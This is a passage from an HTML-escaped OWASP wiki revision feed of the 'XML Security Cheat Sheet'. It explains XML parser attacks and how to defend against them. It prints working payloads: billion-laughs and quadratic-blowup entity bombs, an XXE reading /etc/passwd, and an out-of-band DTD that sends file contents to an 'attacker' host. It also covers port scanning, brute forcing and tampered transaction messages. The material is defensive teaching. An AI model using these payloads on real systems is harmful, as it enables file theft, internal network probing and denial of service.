]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224424</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224424"/>
				<updated>2016-12-21T20:10:47Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
